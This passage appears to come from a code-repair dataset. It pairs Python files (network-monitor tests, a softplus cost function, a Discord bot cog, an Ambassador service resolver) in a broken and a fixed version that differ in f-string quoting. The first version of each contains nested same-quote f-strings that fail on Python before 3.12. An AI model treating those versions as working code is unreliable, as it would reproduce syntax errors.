service = services[service_from_file["name"]]
self.assertEqual(service_from_file["name"], service["name"], "service names do not match")
self.assertEqual(service_from_file["type"], service["type"], "service types do not match")
self.assertEqual(service_from_file["target"], service["target"], "service targets do not match")
if "data" in service_from_file:
self.assertEqual(service_from_file["data"], service["data"], "service passwords do not match")
print(f"---> Compared service: {service["name"]}: success")
if __name__ == "__main__":
unittest.main()
| import inspect
import unittest
from datetime import datetime
import requests
import yaml
import io
from contextlib import redirect_stdout
from quokka_server.device_monitor import discovery as device_discovery
from quokka_server.service_monitor import discovery as service_discovery
# Note: these tests require the quokka server to be running,
# with TESTDB database, e.g. with the following command:
# export FLASK_APP=quokka_server.py ; export TESTDB ; flask run --port 5001
test_hosts = {
"test-host-1": {
"ip_address": "10.0.0.1",
"mac_address": "00:11:22:33:44:01",
"hostname": "test-host-1",
"last_heard": str(datetime.now())[:-3],
"availability": True,
"response_time": "0.501",
},
"test-host-2": {
"ip_address": "10.0.0.2",
"mac_address": "00:11:22:33:44:02",
"hostname": "test-host-2",
"last_heard": str(datetime.now())[:-3],
"availability": True,
"response_time": "0.502",
},
}
class TestQuokka(unittest.TestCase):
def test_hosts(self):
print(f"\n\n===== {self.__class__.__name__}: {inspect.stack()[0][3]} =================================\n")
print("Storing hosts into quokka:")
for hostname, host in test_hosts.items():
rsp = requests.put("http://127.0.0.1:5001/hosts", params={"hostname": hostname}, json=host)
self.assertEqual(rsp.status_code, 204, f"status code: expected 204, received {rsp.status_code}")
print(f"---> host: {hostname} stored into quokka: success")
print("\nRetrieving hosts from quokka:")
rsp = requests.get("http://127.0.0.1:5001/hosts")
self.assertEqual(rsp.status_code, 200, f"status code: expected 200, received {rsp.status_code}")
hosts = rsp.json()
print(f"---> Retrieved {len(hosts)} hosts: success")
print(f"\nComparing hosts to originals")
self.assertTrue(isinstance(hosts, dict))
self.assertEqual(len(hosts), len(test_hosts), "wrong number of hosts retrieved")
for hostname, host in hosts.items():
self.assertTrue(hostname in test_hosts, f"hostname: {hostname} not in test_hosts")
self.assertEqual(host, test_hosts[hostname], f"host not equal to test_host")
print(f"---> Compared host: {hostname}: success")
def test_devices(self):
print(f"\n\n===== {self.__class__.__name__}: {inspect.stack()[0][3]} =================================\n")
print("Discovering devices using device_monitor")
with io.StringIO() as buf, redirect_stdout(buf):
device_discovery()
print("Discovering devices using device_monitor: completed")
with open("devices.yaml", "r") as yaml_in:
yaml_devices = yaml_in.read()
devices_from_file = yaml.safe_load(yaml_devices)
print("\nRetrieving devices from quokka:")
rsp = requests.get("http://127.0.0.1:5001/devices")
self.assertEqual(rsp.status_code, 200, f"status code: expected 200, received {rsp.status_code}")
devices = rsp.json()
print(f"---> Retrieved {len(devices)} devices: success")
print(f"\nComparing hosts to originals")
self.assertTrue(isinstance(devices, dict))
self.assertEqual(len(devices), len(devices_from_file), "wrong number of devices retrieved")
for device_from_file in devices_from_file:
self.assertTrue(device_from_file["name"] in devices, f"device: {device_from_file['name']} not found in devices")
device = devices[device_from_file["name"]]
self.assertEqual(device_from_file["name"], device["name"], "device names do not match")
self.assertEqual(device_from_file["os"], device["os"], "device oses do not match")
self.assertEqual(device_from_file["hostname"], device["hostname"], "device hostnames do not match")
self.assertEqual(device_from_file["password"], device["password"], "device passwords do not match")
self.assertEqual(device_from_file["username"], device["username"], "device usernames do not match")
self.assertEqual(device_from_file["vendor"], device["vendor"], "device vendors do not match")
self.assertEqual(device_from_file["transport"], device["transport"], "device transports do not match")
print(f"---> Compared device: {device['name']}: success")
def test_services(self):
print(f"\n\n===== {self.__class__.__name__}: {inspect.stack()[0][3]} =================================\n")
print("Discovering services using service_monitor")
with io.StringIO() as buf, redirect_stdout(buf):
service_discovery()
print("Discovering services using service_monitor: completed")
with open("services.yaml", "r") as yaml_in:
yaml_services = yaml_in.read()
services_from_file = yaml.safe_load(yaml_services)
print("\nRetrieving services from quokka:")
rsp = requests.get("http://127.0.0.1:5001/services")
self.assertEqual(rsp.status_code, 200, f"status code: expected 200, received {rsp.status_code}")
services = rsp.json()
print(f"---> Retrieved {len(services)} services: success")
print(f"\nComparing services to originals")
self.assertTrue(isinstance(services, dict))
self.assertEqual(len(services), len(services_from_file), "wrong number of services retrieved")
for service_from_file in services_from_file:
self.assertTrue(service_from_file["name"] in services, f"service: {service_from_file['name']} not found in services")
service = services[service_from_file["name"]]
self.assertEqual(service_from_file["name"], service["name"], "service names do not match")
self.assertEqual(service_from_file["type"], service["type"], "service types do not match")
self.assertEqual(service_from_file["target"], service["target"], "service targets do not match")
if "data" in service_from_file:
self.assertEqual(service_from_file["data"], service["data"], "service passwords do not match")
print(f"---> Compared service: {service['name']}: success")
if __name__ == "__main__":
unittest.main()
|
" Implementation of the softplus cost function"
from typing import List
import numpy as np
from rxn_network.core import CostFunction
from rxn_network.reactions import ComputedReaction
class Softplus(CostFunction):
"""
The softplus cost function is a smooth version of the Rectified Linear Unit (
ReLU) function commonly used in neural networks. It has the property that the
output goes to 0 as the input goes to negative infinity, but the output
approaches a linear scaling as the input goes to positive infinity. This is an
especially useful mapping for applying it to determine costs in reaction networks.
"""
def __init__(
self,
temp: float = 300,
params: List[str] = ["energy_per_atom"],
weights: List[float] = [1.0],
):
"""
Args:
temp: Temperature [K].
params: List of data dictionary keys for function parameters used in the
softplus function. Defaults to ["energy_per_atom"]
weights: List of corresponding values by which to weight the
function parameters. Defaults to [1.0].
"""
self.temp = temp
self.params = params
self.weights = np.array(weights)
def evaluate(self, rxn: ComputedReaction) -> float:
"""
Calculates the ost of reaction based on the initialized parameters and weights.
Args:
rxn: A computed reaction.
Returns:
The cost of the reaction.
"""
values = []
for p in self.params:
if rxn.data and p in rxn.data:
value = rxn.data[p]
elif hasattr(rxn, p):
value = getattr(rxn, p)
else:
raise ValueError(f"Reaction is missing parameter {p}!")
values.append(value)
values = np.array(values)
total = np.dot(values, self.weights)
return self._softplus(total, self.temp)
@staticmethod
def _softplus(x: float, t: float) -> float:
"The mathematical formula for the softplus function"
return np.log(1 + (273 / t) * np.exp(x))
def __repr__(self):
return (
f"Softplus with parameters: "
f"{" ".join([(f"{k} ({v})') for k, v in zip(self.params, self.weights)])}"
)
| " Implementation of the softplus cost function"
from typing import List
import numpy as np
from rxn_network.core import CostFunction
from rxn_network.reactions import ComputedReaction
class Softplus(CostFunction):
"""
The softplus cost function is a smooth version of the Rectified Linear Unit (
ReLU) function commonly used in neural networks. It has the property that the
output goes to 0 as the input goes to negative infinity, but the output
approaches a linear scaling as the input goes to positive infinity. This is an
especially useful mapping for applying it to determine costs in reaction networks.
"""
def __init__(
self,
temp: float = 300,
params: List[str] = ["energy_per_atom"],
weights: List[float] = [1.0],
):
"""
Args:
temp: Temperature [K].
params: List of data dictionary keys for function parameters used in the
softplus function. Defaults to ["energy_per_atom"]
weights: List of corresponding values by which to weight the
function parameters. Defaults to [1.0].
"""
self.temp = temp
self.params = params
self.weights = np.array(weights)
def evaluate(self, rxn: ComputedReaction) -> float:
"""
Calculates the ost of reaction based on the initialized parameters and weights.
Args:
rxn: A computed reaction.
Returns:
The cost of the reaction.
"""
values = []
for p in self.params:
if rxn.data and p in rxn.data:
value = rxn.data[p]
elif hasattr(rxn, p):
value = getattr(rxn, p)
else:
raise ValueError(f"Reaction is missing parameter {p}!")
values.append(value)
values = np.array(values)
total = np.dot(values, self.weights)
return self._softplus(total, self.temp)
@staticmethod
def _softplus(x: float, t: float) -> float:
"The mathematical formula for the softplus function"
return np.log(1 + (273 / t) * np.exp(x))
def __repr__(self):
return (
f"Softplus with parameters: "
f"{' '.join([(f'{k} ({v})') for k, v in zip(self.params, self.weights)])}"
)
|
from typing import Optional
from datetime import datetime
from collections import Counter
import discord
from discord.ext import commands
from utils.global_utils import bright_color
from utils.converters import CaseInsensitiveMember, CaseInsensitiveChannel
class GuildCog(commands.Cog, name='Server'):
def __init__(self, bot):
self.bot = bot
# Applies commands.guild_only() check for all methods in this cog
async def cog_check(self, ctx):
if ctx.guild is None:
raise commands.NoPrivateMessage
return True
@commands.command()
async def joined(self, ctx, *, member: CaseInsensitiveMember = None):
"""Looks up when a member joined the server."""
if not member:
member = ctx.author
await ctx.send(f'{member.display_name} joined on {member.joined_at.isoformat(' ', 'seconds')}')
@commands.command(name='members', aliases=['memcount', 'membercount'])
async def member_count(self, ctx):
"""Returns the member count of the guild"""
statuses = Counter(m.status for m in ctx.guild.members)
bots = Counter(m.bot for m in ctx.guild.members)
formatted_statuses = f'<:status_online:602811779948740627> {statuses.get(discord.Status.online, 0)}\n' \
f'<:status_offline:602811780053336069> {statuses.get(discord.Status.offline, 0)}\n' \
f'<:status_idle:602811780129095701> {statuses.get(discord.Status.idle, 0)}\n' \
f'<:status_dnd:602811779931701259> {statuses.get(discord.Status.dnd, 0)}'
e = discord.Embed(color=bright_color(), timestamp=datetime.utcnow())
e.set_author(name=f'{ctx.guild}\'s member count', icon_url=ctx.guild.icon)
e.add_field(name='Total', value=ctx.guild.member_count)
e.add_field(name='Humans', value=bots.get(False, 0))
e.add_field(name='Bots', value=bots.get(True, 0))
e.add_field(name='Status', value=formatted_statuses)
await ctx.send(embed=e)
@commands.command(name='channelperms', aliases=['cperms'])
async def channel_permissions(self, ctx, channel: Optional[CaseInsensitiveChannel], *, member: CaseInsensitiveMember = None):
"""Lists permissions of a member in a particular channel.
If no channel is provided, the current channel will be checked.
If a member is not provided, the author will be checked."""
member = member or ctx.author
channel = channel or ctx.channel
if channel.type is discord.ChannelType.text:
voice_perms = ('priority_speaker', 'stream', 'connect', 'speak', 'mute_members', 'deafen_members',
'move_members', 'use_voice_activation')
perms = '\n'.join(f'<:greenTick:602811779835494410> {perm}' if value else f'<:redTick:602811779474522113> {perm}'
for perm, value in channel.permissions_for(member) if perm not in voice_perms)
# Voice permissions are always False in text channels, we will just not show them
else:
perms = '\n'.join(f'<:greenTick:602811779835494410> {perm}' if value else f'<:redTick:602811779474522113> {perm}'
for perm, value in channel.permissions_for(member))
e = discord.Embed(title=f'Channel permissions in #{channel}:',
description=perms,
colour=member.colour)
e.set_author(icon_url=member.display_avatar.url, name=str(member))
e.set_footer(text=f'Channel Type: {str(channel.type).capitalize()}')
await ctx.send(embed=e)
@commands.command(name='perms')
async def get_all_permissions(self, ctx, *, member: CaseInsensitiveMember = None):
"""Lists all permissions of a member.
If a member is not provided, the author will be checked."""
member = member or ctx.author
perms = '\n'.join(f'<:greenTick:602811779835494410> {perm}' if value else f'<:redTick:602811779474522113> {perm}'
for perm, value in member.guild_permissions)
e = discord.Embed(title='Server Permissions', description=perms, colour=member.colour)
e.set_author(icon_url=member.display_avatar.url, name=member)
await ctx.send(embed=e)
@commands.command(name='sharescreen', aliases=['share', 'ss', 'video'], hidden=True)
async def video_in_VC(self, ctx, *, channel: Optional[discord.VoiceChannel] = None):
"""Enables video call in a voice channel.
Defaults to your current voice channel or you can specify a voice channel"""
author = ctx.message.author
if author.voice is None and channel is None:
return await ctx.send('Either you did not enter a valid channel or you are not in a voice channel! <:beemad:545443640323997717>')
if channel is None:
channel = author.voice.channel
link = discord.utils.escape_markdown(f'https://discordapp.com/channels/{ctx.message.guild.id}/{channel.id}/')
name = discord.utils.escape_markdown(channel.name)
e = discord.Embed(colour=author.color,
description=f"[Click here to join video session for __**{name}**__]({link})\n"
f"You must be in the voice channel to use this link")
await ctx.send(embed=e)
@commands.command(name='shareall', hidden=True)
async def sharescreen_all(self, ctx):
"""Returns all voice channel's video links"""
template = f'https://discordapp.com/channels/{ctx.guild.id}/'
links = [f'[{vc.name}]({template}{vc.id})' for vc in ctx.guild.voice_channels]
formatted = discord.utils.escape_markdown('\n'.join(links)) # because some ppl like to have ||name|| for some reason
e = discord.Embed(title="Video Links for all Voice Channels",
colour=6430916,
description=formatted)
await ctx.send(embed=e)
await ctx.send(f'You can use {ctx.prefix}share to get the link for a single voice channel or your current voice channel', delete_after=5)
@commands.Cog.listener()
async def on_member_join(self, member):
query = '''SELECT *
FROM guild_config
WHERE id = $1'''
config = await self.bot.pool.fetchrow(query, member.guild.id)
if config is None:
return
if not member.bot:
if config.get('human_join_role') is not None:
try:
await member.add_roles(discord.Object(id=config.get('human_join_role')),
reason='Auto human join role')
except (discord.Forbidden, discord.HTTPException):
pass
else:
if config.get('bot_join_role') is not None:
try:
await member.add_roles(discord.Object(id=config.get('bot_join_role')),
reason='Auto bot join role')
except (discord.Forbidden, discord.HTTPException):
pass
def setup(bot):
bot.add_cog(GuildCog(bot))
| from typing import Optional
from datetime import datetime
from collections import Counter
import discord
from discord.ext import commands
from utils.global_utils import bright_color
from utils.converters import CaseInsensitiveMember, CaseInsensitiveChannel
class GuildCog(commands.Cog, name='Server'):
def __init__(self, bot):
self.bot = bot
# Applies commands.guild_only() check for all methods in this cog
async def cog_check(self, ctx):
if ctx.guild is None:
raise commands.NoPrivateMessage
return True
@commands.command()
async def joined(self, ctx, *, member: CaseInsensitiveMember = None):
"""Looks up when a member joined the server."""
if not member:
member = ctx.author
await ctx.send(f'{member.display_name} joined on {member.joined_at.isoformat(" ", "seconds")}')
@commands.command(name='members', aliases=['memcount', 'membercount'])
async def member_count(self, ctx):
"""Returns the member count of the guild"""
statuses = Counter(m.status for m in ctx.guild.members)
bots = Counter(m.bot for m in ctx.guild.members)
formatted_statuses = f'<:status_online:602811779948740627> {statuses.get(discord.Status.online, 0)}\n' \
f'<:status_offline:602811780053336069> {statuses.get(discord.Status.offline, 0)}\n' \
f'<:status_idle:602811780129095701> {statuses.get(discord.Status.idle, 0)}\n' \
f'<:status_dnd:602811779931701259> {statuses.get(discord.Status.dnd, 0)}'
e = discord.Embed(color=bright_color(), timestamp=datetime.utcnow())
e.set_author(name=f'{ctx.guild}\'s member count', icon_url=ctx.guild.icon)
e.add_field(name='Total', value=ctx.guild.member_count)
e.add_field(name='Humans', value=bots.get(False, 0))
e.add_field(name='Bots', value=bots.get(True, 0))
e.add_field(name='Status', value=formatted_statuses)
await ctx.send(embed=e)
@commands.command(name='channelperms', aliases=['cperms'])
async def channel_permissions(self, ctx, channel: Optional[CaseInsensitiveChannel], *, member: CaseInsensitiveMember = None):
"""Lists permissions of a member in a particular channel.
If no channel is provided, the current channel will be checked.
If a member is not provided, the author will be checked."""
member = member or ctx.author
channel = channel or ctx.channel
if channel.type is discord.ChannelType.text:
voice_perms = ('priority_speaker', 'stream', 'connect', 'speak', 'mute_members', 'deafen_members',
'move_members', 'use_voice_activation')
perms = '\n'.join(f'<:greenTick:602811779835494410> {perm}' if value else f'<:redTick:602811779474522113> {perm}'
for perm, value in channel.permissions_for(member) if perm not in voice_perms)
# Voice permissions are always False in text channels, we will just not show them
else:
perms = '\n'.join(f'<:greenTick:602811779835494410> {perm}' if value else f'<:redTick:602811779474522113> {perm}'
for perm, value in channel.permissions_for(member))
e = discord.Embed(title=f'Channel permissions in #{channel}:',
description=perms,
colour=member.colour)
e.set_author(icon_url=member.display_avatar.url, name=str(member))
e.set_footer(text=f'Channel Type: {str(channel.type).capitalize()}')
await ctx.send(embed=e)
@commands.command(name='perms')
async def get_all_permissions(self, ctx, *, member: CaseInsensitiveMember = None):
"""Lists all permissions of a member.
If a member is not provided, the author will be checked."""
member = member or ctx.author
perms = '\n'.join(f'<:greenTick:602811779835494410> {perm}' if value else f'<:redTick:602811779474522113> {perm}'
for perm, value in member.guild_permissions)
e = discord.Embed(title='Server Permissions', description=perms, colour=member.colour)
e.set_author(icon_url=member.display_avatar.url, name=member)
await ctx.send(embed=e)
@commands.command(name='sharescreen', aliases=['share', 'ss', 'video'], hidden=True)
async def video_in_VC(self, ctx, *, channel: Optional[discord.VoiceChannel] = None):
"""Enables video call in a voice channel.
Defaults to your current voice channel or you can specify a voice channel"""
author = ctx.message.author
if author.voice is None and channel is None:
return await ctx.send('Either you did not enter a valid channel or you are not in a voice channel! <:beemad:545443640323997717>')
if channel is None:
channel = author.voice.channel
link = discord.utils.escape_markdown(f'https://discordapp.com/channels/{ctx.message.guild.id}/{channel.id}/')
name = discord.utils.escape_markdown(channel.name)
e = discord.Embed(colour=author.color,
description=f"[Click here to join video session for __**{name}**__]({link})\n"
f"You must be in the voice channel to use this link")
await ctx.send(embed=e)
@commands.command(name='shareall', hidden=True)
async def sharescreen_all(self, ctx):
"""Returns all voice channel's video links"""
template = f'https://discordapp.com/channels/{ctx.guild.id}/'
links = [f'[{vc.name}]({template}{vc.id})' for vc in ctx.guild.voice_channels]
formatted = discord.utils.escape_markdown('\n'.join(links)) # because some ppl like to have ||name|| for some reason
e = discord.Embed(title="Video Links for all Voice Channels",
colour=6430916,
description=formatted)
await ctx.send(embed=e)
await ctx.send(f'You can use {ctx.prefix}share to get the link for a single voice channel or your current voice channel', delete_after=5)
@commands.Cog.listener()
async def on_member_join(self, member):
query = '''SELECT *
FROM guild_config
WHERE id = $1'''
config = await self.bot.pool.fetchrow(query, member.guild.id)
if config is None:
return
if not member.bot:
if config.get('human_join_role') is not None:
try:
await member.add_roles(discord.Object(id=config.get('human_join_role')),
reason='Auto human join role')
except (discord.Forbidden, discord.HTTPException):
pass
else:
if config.get('bot_join_role') is not None:
try:
await member.add_roles(discord.Object(id=config.get('bot_join_role')),
reason='Auto bot join role')
except (discord.Forbidden, discord.HTTPException):
pass
def setup(bot):
bot.add_cog(GuildCog(bot))
|
from typing import Dict, List, Optional, Union, TYPE_CHECKING
import json
import logging
import re
import urllib.parse
from multi import multi
from ..config import Config
from ..utils import RichStatus
from .irresource import IRResource
from .irtlscontext import IRTLSContext
if TYPE_CHECKING:
from .ir import IR
from .ircluster import IRCluster
from .irbasemapping import IRBaseMapping
#############################################################################
## irserviceresolver.py -- resolve endpoints for services
##
## IRServiceResolver does the work of looking into Service data structures.
## There are, naturally, some weirdnesses.
##
## Here's the way this goes:
##
## When you create an AConf, you must hand in Service objects and Resolver
## objects. (This will generally happen by virtue of the ResourceFetcher
## finding them someplace.) There can be multiple kinds of Resolver objects
## (e.g. ConsulResolver, KubernetesEndpointResolver, etc.).
##
## When you create an IR from that AConf, the various kinds of Resolvers
## all get turned into IRServiceResolvers, and the IR uses those to handle
## the mechanics of finding the upstream endpoints for a service.
SvcEndpoint = Dict[str, Union[int, str]]
SvcEndpointSet = List[SvcEndpoint]
class IRServiceResolver(IRResource):
def __init__(self, ir: 'IR', aconf: Config,
rkey: str = "ir.resolver",
kind: str = "IRServiceResolver",
name: str = "ir.resolver",
location: str = "--internal--",
**kwargs) -> None:
super().__init__(
ir=ir, aconf=aconf, rkey=rkey, kind=kind, name=name,
location=location,
**kwargs)
def setup(self, ir: 'IR', aconf: Config) -> bool:
if self.kind == 'ConsulResolver':
self.resolve_with = 'consul'
if not self.get('datacenter'):
self.post_error("ConsulResolver is required to have a datacenter")
return False
elif self.kind == 'KubernetesServiceResolver':
self.resolve_with = 'k8s'
elif self.kind == 'KubernetesEndpointResolver':
self.resolve_with = 'k8s'
else:
self.post_error(f"Resolver kind {self.kind} unknown")
return False
return True
@multi
def valid_mapping(self, ir: 'IR', mapping: 'IRBaseMapping') -> str:
del ir
del mapping
return self.kind
@valid_mapping.when("KubernetesServiceResolver")
def _k8s_svc_valid_mapping(self, ir: 'IR', mapping: 'IRBaseMapping'):
# You're not allowed to specific a load balancer with a KubernetesServiceResolver.
if mapping.get('load_balancer'):
mapping.post_error('No load_balancer setting is allowed with the KubernetesServiceResolver')
return False
return True
@valid_mapping.when("KubernetesEndpointResolver")
def _k8s_valid_mapping(self, ir: 'IR', mapping: 'IRBaseMapping'):
# There's no real validation to do here beyond what the Mapping already does.
return True
@valid_mapping.when("ConsulResolver")
def _consul_valid_mapping(self, ir: 'IR', mapping: 'IRBaseMapping'):
# Mappings using the Consul resolver can't use service names with '.', or port
# override. We currently do this the cheap & sleazy way.
valid = True
if mapping.service.find('.') >= 0:
mapping.post_error('The Consul resolver does not allow dots in service names')
valid = False
if mapping.service.find(':') >= 0:
# This is not an _error_ per se -- we'll accept the mapping and just ignore the port.
ir.aconf.post_notice('The Consul resolver does not allow overriding service port; ignoring requested port',
resource=mapping)
return valid
@multi
def resolve(self, ir: 'IR', cluster: 'IRCluster', svc_name: str, port: int) -> str:
del ir # silence warnings
del cluster
del svc_name
del port
return self.kind
@resolve.when("KubernetesServiceResolver")
def _k8s_svc_resolver(self, ir: 'IR', cluster: 'IRCluster', svc_name: str, port: int) -> Optional[SvcEndpointSet]:
# The K8s service resolver always returns a single endpoint.
return [ {
'ip': svc_name,
'port': port,
'target_kind': 'DNSname'
} ]
@resolve.when("KubernetesEndpointResolver")
def _k8s_resolver(self, ir: 'IR', cluster: 'IRCluster', svc_name: str, port: int) -> Optional[SvcEndpointSet]:
# K8s service names can be 'svc' or 'svc.namespace'. Which does this look like?
svc = svc_name
namespace = Config.ambassador_namespace
if '.' in svc:
# OK, cool. Peel off the service and the namespace.
#
# Note that some people may use service.namespace.cluster.svc.local or
# some such crap. The [0:2] is to restrict this to just the first two
# elements if there are more, but still work if there are not.
(svc, namespace) = svc.split(".", 2)[0:2]
# Find endpoints, and try for a port match!
return self.get_endpoints(ir, f'k8s-{svc}-{namespace}', port)
@resolve.when("ConsulResolver")
def _consul_resolver(self, ir: 'IR', cluster: 'IRCluster', svc_name: str, port: int) -> Optional[SvcEndpointSet]:
# For Consul, we look things up with the service name and the datacenter at present.
# We ignore the port in the lookup (we should've already posted a warning about the port
# being present, actually).
return self.get_endpoints(ir, f'consul-{svc_name}-{self.datacenter}', None)
def get_endpoints(self, ir: 'IR', key: str, port: Optional[int]) -> Optional[SvcEndpointSet]:
# OK. Do we have a Service by this key?
service = ir.services.get(key)
if not service:
self.logger.debug(f'Resolver {self.name}: {key} matches no Service')
return None
self.logger.debug(f'Resolver {self.name}: {key} matches %s' % service.as_json())
endpoints = service.get('endpoints')
if not endpoints:
self.logger.debug(f'Resolver {self.name}: {key} has no endpoints')
return None
# Do we have a match for the port they're asking for (y'know, if they're asking for one)?
targets = endpoints.get(port or '*')
if targets:
# Yes!
tstr = ", ".join([ f'{x['ip']}:{x['port']}' for x in targets ])
self.logger.debug(f'Resolver {self.name}: {key}:{port} matches {tstr}')
return targets
else:
hrtype = 'Kubernetes' if (self.resolve_with == 'k8s') else self.resolve_with
# This is ugly. We're almost certainly being called from _within_ the initialization
# of the cluster here -- so I guess we'll report the error against the service. Sigh.
self.ir.aconf.post_error(f'Service {service.name}: {key}:{port} matches no endpoints from {hrtype}',
resource=service)
return None
class IRServiceResolverFactory:
@classmethod
def load_all(cls, ir: 'IR', aconf: Config) -> None:
config_info = aconf.get_config('resolvers')
if config_info:
assert(len(config_info) > 0) # really rank paranoia on my part...
for config in config_info.values():
cdict = config.as_dict()
cdict['rkey'] = config.rkey
cdict['location'] = config.location
ir.add_resolver(IRServiceResolver(ir, aconf, **cdict))
if not ir.get_resolver('kubernetes-service'):
# Default the K8s service resolver.
resolver_config = {
'apiVersion': 'getambassador.io/v2',
'kind': 'KubernetesServiceResolver',
'name': 'kubernetes-service'
}
if Config.single_namespace:
resolver_config['namespace'] = Config.ambassador_namespace
ir.add_resolver(IRServiceResolver(ir, aconf, **resolver_config))
# Ugh, the aliasing for the K8s and Consul endpoint resolvers is annoying.
res_e = ir.get_resolver('endpoint')
res_k_e = ir.get_resolver('kubernetes-endpoint')
if not res_e and not res_k_e:
# Neither exists. Create them from scratch.
resolver_config = {
'apiVersion': 'getambassador.io/v2',
'kind': 'KubernetesEndpointResolver',
'name': 'kubernetes-endpoint'
}
if Config.single_namespace:
resolver_config['namespace'] = Config.ambassador_namespace
ir.add_resolver(IRServiceResolver(ir, aconf, **resolver_config))
resolver_config['name'] = 'endpoint'
ir.add_resolver(IRServiceResolver(ir, aconf, **resolver_config))
else:
cls.check_aliases(ir, aconf, 'endpoint', res_e, 'kubernetes-endpoint', res_k_e)
res_c = ir.get_resolver('consul')
res_c_e = ir.get_resolver('consul-endpoint')
if not res_c and not res_c_e:
# Neither exists. Create them from scratch.
resolver_config = {
'apiVersion': 'getambassador.io/v2',
'kind': 'ConsulResolver',
'name': 'consul-endpoint',
'datacenter': 'dc1'
}
ir.add_resolver(IRServiceResolver(ir, aconf, **resolver_config))
resolver_config['name'] = 'consul'
ir.add_resolver(IRServiceResolver(ir, aconf, **resolver_config))
else:
cls.check_aliases(ir, aconf, 'consul', res_c, 'consul-endpoint', res_c_e)
@classmethod
def check_aliases(cls, ir: 'IR', aconf: Config,
n1: str, r1: Optional[IRServiceResolver],
n2: str, r2: Optional[IRServiceResolver]) -> None:
source = None
name = None
if not r1:
# r2 must exist to be here.
source = r2
name = n1
elif not r2:
# r1 must exist to be here.
source = r1
name = n2
if source:
config = dict(**source.as_dict())
# Fix up this dict. Sigh.
config['rkey'] = config.pop('_rkey', config.get('rkey', None)) # Kludge, I know...
config.pop('_errored', None)
config.pop('_active', None)
config.pop('resolve_with', None)
config['name'] = name
ir.add_resolver(IRServiceResolver(ir, aconf, **config))
| from typing import Dict, List, Optional, Union, TYPE_CHECKING
import json
import logging
import re
import urllib.parse
from multi import multi
from ..config import Config
from ..utils import RichStatus
from .irresource import IRResource
from .irtlscontext import IRTLSContext
if TYPE_CHECKING:
from .ir import IR
from .ircluster import IRCluster
from .irbasemapping import IRBaseMapping
#############################################################################
## irserviceresolver.py -- resolve endpoints for services
##
## IRServiceResolver does the work of looking into Service data structures.
## There are, naturally, some weirdnesses.
##
## Here's the way this goes:
##
## When you create an AConf, you must hand in Service objects and Resolver
## objects. (This will generally happen by virtue of the ResourceFetcher
## finding them someplace.) There can be multiple kinds of Resolver objects
## (e.g. ConsulResolver, KubernetesEndpointResolver, etc.).
##
## When you create an IR from that AConf, the various kinds of Resolvers
## all get turned into IRServiceResolvers, and the IR uses those to handle
## the mechanics of finding the upstream endpoints for a service.
SvcEndpoint = Dict[str, Union[int, str]]
SvcEndpointSet = List[SvcEndpoint]
class IRServiceResolver(IRResource):
def __init__(self, ir: 'IR', aconf: Config,
rkey: str = "ir.resolver",
kind: str = "IRServiceResolver",
name: str = "ir.resolver",
location: str = "--internal--",
**kwargs) -> None:
super().__init__(
ir=ir, aconf=aconf, rkey=rkey, kind=kind, name=name,
location=location,
**kwargs)
def setup(self, ir: 'IR', aconf: Config) -> bool:
if self.kind == 'ConsulResolver':
self.resolve_with = 'consul'
if not self.get('datacenter'):
self.post_error("ConsulResolver is required to have a datacenter")
return False
elif self.kind == 'KubernetesServiceResolver':
self.resolve_with = 'k8s'
elif self.kind == 'KubernetesEndpointResolver':
self.resolve_with = 'k8s'
else:
self.post_error(f"Resolver kind {self.kind} unknown")
return False
return True
@multi
def valid_mapping(self, ir: 'IR', mapping: 'IRBaseMapping') -> str:
del ir
del mapping
return self.kind
@valid_mapping.when("KubernetesServiceResolver")
def _k8s_svc_valid_mapping(self, ir: 'IR', mapping: 'IRBaseMapping'):
# You're not allowed to specific a load balancer with a KubernetesServiceResolver.
if mapping.get('load_balancer'):
mapping.post_error('No load_balancer setting is allowed with the KubernetesServiceResolver')
return False
return True
@valid_mapping.when("KubernetesEndpointResolver")
def _k8s_valid_mapping(self, ir: 'IR', mapping: 'IRBaseMapping'):
# There's no real validation to do here beyond what the Mapping already does.
return True
@valid_mapping.when("ConsulResolver")
def _consul_valid_mapping(self, ir: 'IR', mapping: 'IRBaseMapping'):
# Mappings using the Consul resolver can't use service names with '.', or port
# override. We currently do this the cheap & sleazy way.
valid = True
if mapping.service.find('.') >= 0:
mapping.post_error('The Consul resolver does not allow dots in service names')
valid = False
if mapping.service.find(':') >= 0:
# This is not an _error_ per se -- we'll accept the mapping and just ignore the port.
ir.aconf.post_notice('The Consul resolver does not allow overriding service port; ignoring requested port',
resource=mapping)
return valid
@multi
def resolve(self, ir: 'IR', cluster: 'IRCluster', svc_name: str, port: int) -> str:
del ir # silence warnings
del cluster
del svc_name
del port
return self.kind
@resolve.when("KubernetesServiceResolver")
def _k8s_svc_resolver(self, ir: 'IR', cluster: 'IRCluster', svc_name: str, port: int) -> Optional[SvcEndpointSet]:
# The K8s service resolver always returns a single endpoint.
return [ {
'ip': svc_name,
'port': port,
'target_kind': 'DNSname'
} ]
@resolve.when("KubernetesEndpointResolver")
def _k8s_resolver(self, ir: 'IR', cluster: 'IRCluster', svc_name: str, port: int) -> Optional[SvcEndpointSet]:
# K8s service names can be 'svc' or 'svc.namespace'. Which does this look like?
svc = svc_name
namespace = Config.ambassador_namespace
if '.' in svc:
# OK, cool. Peel off the service and the namespace.
#
# Note that some people may use service.namespace.cluster.svc.local or
# some such crap. The [0:2] is to restrict this to just the first two
# elements if there are more, but still work if there are not.
(svc, namespace) = svc.split(".", 2)[0:2]
# Find endpoints, and try for a port match!
return self.get_endpoints(ir, f'k8s-{svc}-{namespace}', port)
@resolve.when("ConsulResolver")
def _consul_resolver(self, ir: 'IR', cluster: 'IRCluster', svc_name: str, port: int) -> Optional[SvcEndpointSet]:
# For Consul, we look things up with the service name and the datacenter at present.
# We ignore the port in the lookup (we should've already posted a warning about the port
# being present, actually).
return self.get_endpoints(ir, f'consul-{svc_name}-{self.datacenter}', None)
def get_endpoints(self, ir: 'IR', key: str, port: Optional[int]) -> Optional[SvcEndpointSet]:
# OK. Do we have a Service by this key?
service = ir.services.get(key)
if not service:
self.logger.debug(f'Resolver {self.name}: {key} matches no Service')
return None
self.logger.debug(f'Resolver {self.name}: {key} matches %s' % service.as_json())
endpoints = service.get('endpoints')
if not endpoints:
self.logger.debug(f'Resolver {self.name}: {key} has no endpoints')
return None
# Do we have a match for the port they're asking for (y'know, if they're asking for one)?
targets = endpoints.get(port or '*')
if targets:
# Yes!
tstr = ", ".join([ f'{x["ip"]}:{x["port"]}' for x in targets ])
self.logger.debug(f'Resolver {self.name}: {key}:{port} matches {tstr}')
return targets
else:
